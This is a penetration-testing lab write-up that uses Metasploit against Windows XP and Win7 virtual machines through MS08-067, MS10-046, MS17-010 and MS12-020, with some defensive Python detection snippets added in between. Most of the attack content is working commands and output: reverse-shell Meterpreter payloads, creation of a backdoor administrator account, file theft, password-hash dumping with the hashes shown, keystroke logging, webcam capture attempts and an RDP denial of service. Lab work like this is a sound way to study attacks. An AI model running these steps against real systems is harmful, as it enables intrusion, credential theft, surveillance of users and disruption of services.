
Penetration testing - [Windows - MS08-067 MS10-046 MS17-010 MS12-020]

Time: 2023-02-26 15:38:42


[Common Windows vulnerability attack lab: MS08-067, MS10-046, MS17-010, MS12-020]

0. Lab environment
1. MS08-067 [RPC]
1.1 Vulnerability description
1.2 Host discovery
1.3 Exploiting the target through the ms08-067 vulnerability with MSF
1.4 Post-exploitation
1. Check privileges
2. Shell
3. Add an account
4. Add the new account to the administrators group
5. Screenshot
2. MS10-046 [shortcut automatic code execution]
2.1 Vulnerability description
2.2 Attack
2.3 Post-exploitation
3. MS17-010 [SMB]
3.1 Vulnerability description
3.2 Attack
3.2.1 Target discovery
3.2.2 Attack
3.3 Post-exploitation
3.3.1 Take a screenshot
3.3.2 Upload a file
3.3.3 Download a file
3.3.4 Enter the shell
3.3.5 Obtain password hashes
3.3.6 Webcam
3.3.7 Keylogging
4. MS12-020 [RDP]
4.1 Vulnerability description
4.2 Target discovery
4.3 Attack

This article uses MSF against a Win7 target and a WinXP target to verify attacks on four common Microsoft system vulnerabilities [MS08-067, MS10-046, MS17-010, MS12-020].

0. Lab environment

Subnet: 192.168.155.0/24

NIC mode: NAT

Attacker 1 - Kali - IP: 192.168.155.2

Attacker 2 - mac - IP: 192.168.155.1

Target 1 - WinXP SP3 English - IP: 192.168.155.18

Target 2 - Win7 - IP: 192.168.155.19

1. MS08-067 [RPC]

1.1 Vulnerability description

Microsoft Windows Server service RPC request buffer overflow vulnerability. The Windows Server service contains a buffer overflow in its handling of specially crafted RPC requests; a remote attacker can trigger the overflow by sending a malicious RPC request, fully compromising the system and executing arbitrary instructions with SYSTEM privileges. On Windows 2000, XP and Server , the vulnerability can be exploited without authentication; on Windows Vista and Server , authentication may be required.

1.2 Host discovery

nmap -F 192.168.155.0/24

Starting Nmap 7.91 ( ) at -05-03 03:50 EDT
Nmap scan report for 192.168.155.1
Host is up (0.00084s latency).
Not shown: 97 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
5000/tcp  open  upnp
49152/tcp open  unknown
MAC Address: FA:FF:C2:C2:93:64 (Unknown)

Nmap scan report for 192.168.155.18
Host is up (0.0018s latency).
Not shown: 93 closed ports
PORT     STATE SERVICE
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
MAC Address: 00:0C:29:50:ED:13 (VMware)

Nmap scan report for 192.168.155.2
Host is up (0.0000060s latency).
All 100 scanned ports on 192.168.155.2 are closed

Nmap done: 256 IP addresses (3 hosts up) scanned in 2.23 seconds

Target host IP: 192.168.155.18

Open ports:

PORT     STATE SERVICE
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
MAC Address: 00:0C:29:50:ED:13 (VMware)

Target port: 445

Service: microsoft-ds
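As an added defender's check (not part of the original post), the following Python reads nmap's normal output like the scan above and maps each host's exposed ports to the advisories this lab covers, with the mitigation for each. The sample is constructed in the shape of the page's scan; the 192.168.155.19 entry is an assumption added to show the RDP case, and the port-to-advisory table is a coarse exposure signal, not a vulnerability confirmation.

```python
import re

# Constructed sample in the shape of the lab's "nmap -F" output above. The
# 192.168.155.19 entry is an assumption added to show the RDP case; the page's
# own scan only lists 192.168.155.18 with these ports (others omitted here).
SAMPLE_NMAP = """\
Nmap scan report for 192.168.155.18
Host is up (0.0018s latency).
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
MAC Address: 00:0C:29:50:ED:13 (VMware)
Nmap scan report for 192.168.155.19
Host is up (0.0012s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
"""

# Exposed port -> (advisories from this lab reachable over it, mitigation).
# An open port is a coarse signal: the service is reachable, not proven
# unpatched. Confirm with a patch inventory before treating it as vulnerable.
EXPOSURE = {
    445: (["MS08-067", "MS17-010"], "patch, disable SMBv1, block TCP 445 at the boundary"),
    3389: (["MS12-020"], "patch, restrict TCP 3389 to management networks"),
}

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")

def parse_nmap(text):
    """Return {host: [(port, service), ...]} from nmap normal output."""
    hosts, current = {}, None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            current = m.group(1)
            hosts[current] = []
        elif (m := PORT_RE.match(line)) and current is not None:
            hosts[current].append((int(m.group(1)), m.group(2)))
    return hosts

def exposure_report(text):
    """Map each host to (port, service, advisories, mitigation) findings."""
    report = {}
    for host, ports in parse_nmap(text).items():
        findings = [(p, s) + EXPOSURE[p] for p, s in ports if p in EXPOSURE]
        if findings:
            report[host] = findings
    return report
```

Calling exposure_report(SAMPLE_NMAP) gives one finding for the XP host (445, MS08-067/MS17-010) and two for the constructed Win7 host (445 and 3389).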

1.3 Exploiting the target through the ms08-067 vulnerability with MSF

msfconsole
search ms08-067
msf6 > use exploit/windows/smb/ms08_067_netapi
show targets
set target 0
set RHOSTS 192.168.155.18
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

exploit
[*] Started reverse TCP handler on 192.168.155.2:4444
[*] 192.168.155.18:445 - Automatically detecting the target...
[*] 192.168.155.18:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.155.18:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.155.18:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.155.18
[*] Meterpreter session 1 opened (192.168.155.2:4444 -> 192.168.155.18:1074) at -05-03 04:42:05 -0400

1.4 Post-exploitation

1. Check privileges:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We can see that SYSTEM privileges were obtained.

2. Shell

meterpreter > shell
Process 3980 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Successfully entered the target system's shell.

3. Add an account

C:\WINDOWS\system32>net user sxk /add
net user sxk /add
The command completed successfully.

4. Add the new account to the administrators group

C:\WINDOWS\system32>net localgroup administrators sxk /add
net localgroup administrators sxk /add
The command completed successfully.

The user has been added to the target system's administrators group.
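The account creation and group change above leave Windows Security log events behind. As an added example (not from the original post), the following Python correlates them to catch exactly this sequence: an account that lands in Administrators within minutes of being created. The one-line log format is a constructed simplification; the event IDs 4720/4732 are the Vista-and-later IDs for "user account created" and "member added to a security-enabled local group", and 624/636 are the XP equivalents the lab's XP target would actually write.

```python
import re
from datetime import datetime

# Constructed, simplified one-line rendering of Windows Security log events
# (not real exported logs). 4720/4732 are the Vista-and-later IDs for "user
# account created" / "member added to a local group"; 624/636 are the XP
# equivalents, which is what the XP target in this lab would actually write.
SAMPLE_EVENTS = """\
2023-02-26 15:40:01 EventID=4624 Subject=WINXP\\alice Target=alice Group=-
2023-02-26 15:40:12 EventID=4720 Subject=NT AUTHORITY\\SYSTEM Target=sxk Group=-
2023-02-26 15:40:15 EventID=4732 Subject=NT AUTHORITY\\SYSTEM Target=sxk Group=Administrators
2023-02-26 16:10:00 EventID=4720 Subject=WINXP\\alice Target=bob Group=-
2023-02-26 18:30:00 EventID=4732 Subject=WINXP\\alice Target=bob Group=Administrators
"""

CREATE_IDS = {4720, 624}
ADMIN_ADD_IDS = {4732, 636}
LINE_RE = re.compile(
    r"^(\S+ \S+) EventID=(\d+) Subject=(.+?) Target=(\S+) Group=(\S+)$"
)

def parse_events(text):
    """Return [(timestamp, event_id, subject, target, group)] per well-formed line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            events.append((ts, int(m.group(2)), m.group(3), m.group(4), m.group(5)))
    return events

def detect_new_admins(text, window_seconds=600):
    """Flag accounts added to Administrators within window_seconds of creation.

    A freshly created local account that is placed in Administrators within
    minutes is the 'net user /add; net localgroup administrators /add'
    pattern from the post-exploitation steps above. The subject is reported
    so the analyst can see which account or service context performed it.
    """
    created = {}          # target account -> creation timestamp
    alerts = []
    for ts, eid, subject, target, group in parse_events(text):
        if eid in CREATE_IDS:
            created[target] = ts
        elif eid in ADMIN_ADD_IDS and group.lower() == "administrators":
            born = created.get(target)
            if born is not None and (ts - born).total_seconds() <= window_seconds:
                alerts.append({"account": target, "subject": subject,
                               "seconds_after_creation": int((ts - born).total_seconds())})
    return alerts
```

With the default ten-minute window only sxk is flagged (created and promoted three seconds apart); widening the window to a few hours also catches bob.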

5. Screenshot

meterpreter > screenshot
Screenshot saved to: /root/Desktop/YhioHCHD.jpeg

2. MS10-046 [shortcut automatic code execution]

2.1 Vulnerability description

Microsoft Windows shortcut LNK file automatic code execution vulnerability.

Windows supports shortcuts, or LNK files. An LNK file is a reference to a local file; clicking an LNK file has the same effect as clicking the target the shortcut specifies. Windows does not handle LNK files correctly: a specially crafted LNK file can cause Windows to automatically execute the code the shortcut points to. That code may reside on a USB drive, a local or remote file system, an optical drive or elsewhere; merely viewing the location of the LNK file in Explorer is enough to trigger the vulnerability.

Affected systems include: Windows XP SP3/SP2, Vista SP2/SP1, Server R2/SP2 and Win 7.

2.2 Attack

search ms10-046

exploit/windows/browser/ms10_046_shortcut_icon_dllloader

exploit/windows/smb/ms10_046_shortcut_icon_dllloader

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show options

Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  80               yes       The daemon port to listen on (do not change)
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   UNCHOST                   no        The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
   URIPATH  /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.155.2    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

set SRVHOST 192.168.155.2    [note: this is the IP of Kali, i.e. the attacker]
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
show options

Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.155.2    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  80               yes       The daemon port to listen on (do not change)
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   UNCHOST                   no        The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
   URIPATH  /                yes       The URI to use (do not change).

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.155.2    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

exploit

In the browser of the victim XP host, visit the IP of the Kali attacker

http://192.168.155.2:80/

A folder pops up containing a [.dll file] and a [shortcut]. [Double-click] the shortcut, then return to Kali to observe the result.

It shows that control of a machine was obtained. Next, enter the command [sessions 1] to enter the target system's [meterpreter] control interface; the vulnerability has been reproduced successfully.

sessions 1

2.3 Post-exploitation

See ms08-067.

3. MS17-010 [SMB]

3.1 Vulnerability description

Vulnerability description: Microsoft Windows SMB Server remote code execution vulnerability

The Microsoft Server Message Block 1.0 (SMBv1) server contains a remote code execution vulnerability in its handling of certain requests; successful exploitation lets an attacker execute arbitrary code on the target server. A failed attack causes a denial of service, which poses a certain security risk to the business.

Affected systems: Microsoft Windows Server , Microsoft Windows Server R2, Microsoft Windows Server , Microsoft Windows Server R2, Microsoft Windows Server , Microsoft Windows RT 8.1, and so on.

3.2 Attack

3.2.1 Target discovery

search ms17-010

The auxiliary/scanner/smb/smb_ms17_010 auxiliary module helps us find targets that have the corresponding vulnerability.

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.155.18 192.168.155.19 192.168.155.0
run

The scan shows that 192.168.155.19, i.e. target 2 (the Win7 system), may have the ms17-010 vulnerability.

back

Exit the current module

3.2.2 Attack

search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS 192.168.155.19
set LHOST 192.168.155.1
run

SYSTEM privileges obtained.

3.3 Post-exploitation

3.3.1 Take a screenshot

meterpreter > screenshot
Screenshot saved to: /Users/xiaokaisi/MYSHXRuM.jpeg

3.3.2 Upload a file

meterpreter > upload /Users/xiaokaisi/MYSHXRuM.jpeg

[*] uploading : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
[*] Uploaded 260.89 KiB of 260.89 KiB (100.0%): /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
[*] uploaded : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg

pwd
C:\Windows\system32

The file was successfully uploaded to the target system's C: drive.

3.3.3 Download a file

meterpreter > download drivers/etc/hosts

[*] Downloading: drivers/etc/hosts -> /Users/xiaokaisi/hosts
[*] Downloaded 854.00 B of 854.00 B (100.0%): drivers/etc/hosts -> /Users/xiaokaisi/hosts
[*] download : drivers/etc/hosts -> /Users/xiaokaisi/hosts

Successfully downloaded the target system's hosts file.

3.3.4 Enter the shell

meterpreter > shell

Process 6872 created.
Channel 3 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) Microsoft Corporation。保留所有权利。

C:\Windows\system32>

3.3.5 Obtain password hashes

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
client:1000:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Crack the hash values:

259745cb123a52aa2e693aaacca2db52

31d6cfe0d16ae931b73c59d7e0c089c0
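An added defensive reading of the hashdump output above (example code, not from the original post): instead of cracking the hashes, it parses the pwdump-format lines and flags what a SAM audit cares about. The two constants are the well-known LM and NT hashes of the empty string; the sample rows are the page's own output.

```python
# Known hashes of the empty string: the LM value is the marker that LM hashes
# are not stored; the NT value means the account has a blank password. Both
# appear in the hashdump output above.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Taken from the page's hashdump output above (pwdump format:
# user:rid:lm_hash:nt_hash:::).
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
client:1000:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

def parse_pwdump(text):
    """Return [(user, rid, lm, nt)] from pwdump-format lines; skip malformed ones."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        rows.append((parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return rows

def audit_hashdump(text):
    """Flag weak credential storage visible in a SAM dump.

    - empty NT hash: the account has a blank password (or is a built-in
      account such as Guest that should stay disabled);
    - RID 500 with an empty NT hash: the built-in Administrator has no
      password, the worst case;
    - LM hash other than the empty marker: LM hashes are still stored and
      are trivially recoverable; enable NoLMHash ("Do not store LAN Manager
      hash value on next password change") and rotate the passwords.
    """
    findings = []
    for user, rid, lm, nt in parse_pwdump(text):
        if nt == EMPTY_NT:
            sev = "critical" if rid == 500 else "high"
            findings.append((user, sev, "blank password (empty NT hash)"))
        if lm != EMPTY_LM:
            findings.append((user, "medium", "LM hash stored; enable NoLMHash"))
    return findings
```

On the page's dump this reports Administrator (critical) and Guest (high) as blank-password accounts and nothing for client, whose NT hash is a real one.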

3.3.6 Webcam

meterpreter > webcam_list      [list webcams]
[-] No webcams were found
meterpreter > webcam_snap      [take a photo with the webcam]
[-] Target does not have a webcam
meterpreter > webcam_stream    [stream video from the webcam]
[-] Target does not have a webcam

3.3.7 Keylogging

For example, to record the keystrokes of the target system's user Administrator, the process must be migrated into one of Administrator's processes. Under SYSTEM privileges, Administrator's keystrokes cannot be captured.

After starting the keystroke sniffer with keyscan_start, export the captured keystrokes with keyscan_dump; only run keyscan_stop once you no longer want to capture. Do not run keyscan_stop before keyscan_dump.

Use ps to find a suitable process to migrate into

meterpreter > ps

3668 3608 explorer.exe    [commonly used process]

meterpreter > migrate 3668

[*] Migrating from 1048 to 3668...
[*] Migration completed successfully.

meterpreter > getuid
Server username: client-PC\client

meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...
wo shi client ,<Shift>Ilove china<CR>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

The keystrokes of the user on the target system were captured successfully: "wo shi client ,Ilove china"

4. MS12-020 [RDP]

4.1 Vulnerability description

A major vulnerability in the Remote Desktop Protocol: an intruder can send a series of specific RDP packets to the default Remote Desktop port (3389) to obtain super-administrator privileges and compromise the system. Hosts that expose the Remote Desktop service on the default port 3389 become attack targets.

In addition, the Remote Desktop Protocol (RDP) is a multi-channel protocol and can be used for DoS attacks.

According to Microsoft's security bulletin, the entire Windows family of operating systems (WinXP/Vista/Win7/Win2000/Win/Win) is exposed to this threat.

4.2 Target discovery

search ms12-020

auxiliary/scanner/rdp/ms12_020_check
auxiliary/dos/windows/rdp/ms12_020_maxchannelids

use auxiliary/scanner/rdp/ms12_020_check

Use the auxiliary module's scanner for target discovery.

set RHOSTS 192.168.155.0/24
set THREADS 20
run

The scan shows that 192.168.155.19, i.e. the Win7 host, is a possible attack target.

4.3 Attack

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see /rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   3389             yes       The target port (TCP)

set RHOSTS 192.168.155.19
run

[*] Running module against 192.168.155.19
[*] 192.168.155.19:3389 - 192.168.155.19:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.155.19:3389 - 192.168.155.19:3389 - 210 bytes sent
[*] 192.168.155.19:3389 - 192.168.155.19:3389 - Checking RDP status...
[+] 192.168.155.19:3389 - 192.168.155.19:3389 seems down
[*] Auxiliary module execution completed

The target host blue-screened and was forced offline to reboot; the DoS attack succeeded.
